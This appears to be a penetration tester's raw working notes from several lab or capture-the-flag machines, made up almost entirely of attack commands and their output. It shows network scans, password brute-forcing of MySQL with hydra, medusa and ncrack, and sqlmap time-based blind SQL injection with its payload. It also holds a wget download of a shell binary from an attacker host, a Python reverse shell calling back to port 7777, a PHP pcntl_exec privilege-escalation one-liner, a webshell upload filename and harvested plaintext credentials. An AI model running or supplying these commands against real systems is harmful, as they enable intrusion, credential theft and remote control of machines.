~/workspace sudo arp-scan -I ens33 -l
Interface: ens33, type: EN10MB, MAC: 00:0c:29:a1:f0:49, IPv4: 192.168.89.15
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.89.13   08:00:27:96:66:e2       PCS Systemtechnik GmbH
192.168.89.99   f6:39:4a:3d:95:18       (Unknown: locally administered)
192.168.89.247  ca:a7:78:4d:50:e1       (Unknown: locally administered)

~/workspace sudo nmap 192.168.89.13 -Pn -sT -p- -A --min-rate=10000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 07:34 EDT
Nmap scan report for 192.168.89.13
Host is up (0.0025s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE     VERSION
22/tcp   open  ssh         OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey:
|   3072 de:bf:2a:93:86:b8:b3:a3:13:5b:46:66:34:d6:dc:b1 (RSA)
|   256 a9:df:bb:71:90:6c:d1:2f:e7:48:97:2e:ad:7b:15:d3 (ECDSA)
|_  256 78:75:83:1c:03:03:a1:92:4f:73:8e:f2:2d:23:d2:0e (ED25519)
80/tcp   open  http        Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: FBI Access
8080/tcp open  nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (application/json).
MAC Address: 08:00:27:96:66:E2 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   2.52 ms 192.168.89.13

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.70 seconds

~/workspace whatweb 192.168.89.13
http://192.168.89.13 [200 OK] Apache[2.4.51], Bootstrap, Country[RESERVED][ZZ], HTML5, HTTPServer[Debian Linux][Apache/2.4.51 (Debian)], IP[192.168.89.13], JQuery[2.1.3], PasswordField, Script, Title[FBI Access]
~/workspace whatweb 192.168.89.13:8080
http://192.168.89.13:8080 [400 Bad Request] Country[RESERVED][ZZ], IP[192.168.89.13]

sudo ncrack -T5 -v -u trainerjeff -P /usr/share/wordlists/rockyou.txt mysql://192.168.10.8
sudo  medusa -h 192.168.10.8 -u trainerjeff -P /usr/share/wordlists/rockyou.txt -M mysql
sudo hydra -l trainerjeff -P /usr/share/wordlists/rockyou.txt 192.168.10.8 mysql

sudo mysql -h 192.168.10.8 -u trainerjeff -psoccer1

|  1 | gonzalo     tH1sS2stH3g0nz4l0pAsSWW0rDD!! 
|  2 | $SECRETLOGINURL /secretLOGIN/login.html  

192.168.10.16

wget http://192.168.10.11:8000/shell.elf -O /tmp/shell.elf&&chmod 777 /tmp/shell.elf

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.10.11",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > nice_or_naughty.py


echo 'import subprocess; subprocess.call(["/tmp/newshell.elf"])' > nice_or_naughty.py

sarah:bohicon

sarah@VivifyTech:~/.gnupg/crls.d$ cat DIR.txt
v:1:

sarah@VivifyTech:~/.private$ cat Tasks.txt
- Change the Design and architecture of the website
- Plan for an audit, it seems like our website is vulnerable
- Remind the team we need to schedule a party before going to holidays
- Give this cred to the new intern for some tasks assigned to him - gbodja:4Tch055ouy370N

sudo arp-scan -I eth5 -l

sudo rustscan -a 192.168.10.13 -r 1-65535 -t 8000 --ulimit 5000

sudo nmap 192.168.10.13 -sT -Pn -p22,80 -sV -sC -O -oN portscan/norm


sudo nmap 192.168.10.13 -sT -Pn -p22,80 --script=vuln -oN portscan/vuln

"webshell.jpeg .php"

192.168.10.12

./usr/bin/php7.0 -r "pcntl_exec('/bin/sh', ['-p']);"

sudo nmap 192.168.10.1/24 -PA -sn -oN portscan/discovery.nmap

192.168.10.10

sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login="

---
Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=admin' AND (SELECT 7762 FROM (SELECT(SLEEP(5)))rBJA) AND 'mJfQ'='mJfQ&password=admin&login=
---

 sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --dbs

 sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --tables -D vinyl_marketplace

sudo sqlmap http://192.168.10.10/login.php --data "username=admin&password=admin&login=" --columns -D vinyl_marketplace -T users

~/workspace cat README.txt
Hi, Cosette, don't forget to disable the debug mode in the web application, we don't want security breaches.

sudo nmap 192.168.10.4 -p22,80 -Pn -sT -sV -O -sC -oA  portscan/nmap

sudo nmap 192.168.10.4 -sT -Pn -p20,80 --script=vuln -oA  portscan/vuln

andrew:x:1000:1000: Andrew Speed:/home/andrew:/bin/bash
nick:x:1001:1001: Nick Greenhorn,,,:/home/nick:/bin/bash